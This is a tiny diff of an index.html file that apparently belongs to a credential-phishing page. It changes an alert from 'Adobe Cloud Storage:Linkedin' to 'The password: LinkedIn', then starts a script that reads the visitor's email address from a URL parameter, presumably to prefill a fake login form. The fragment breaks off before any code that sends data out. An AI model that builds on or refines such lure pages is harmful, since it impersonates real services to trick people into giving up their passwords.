--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
-<script language="javascript">alert('Adobe Cloud Storage:Linkedin');  </script>
-<h2></h2>
+<script language="javascript">alert(' The password:  LinkedIn');  </script>
+
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
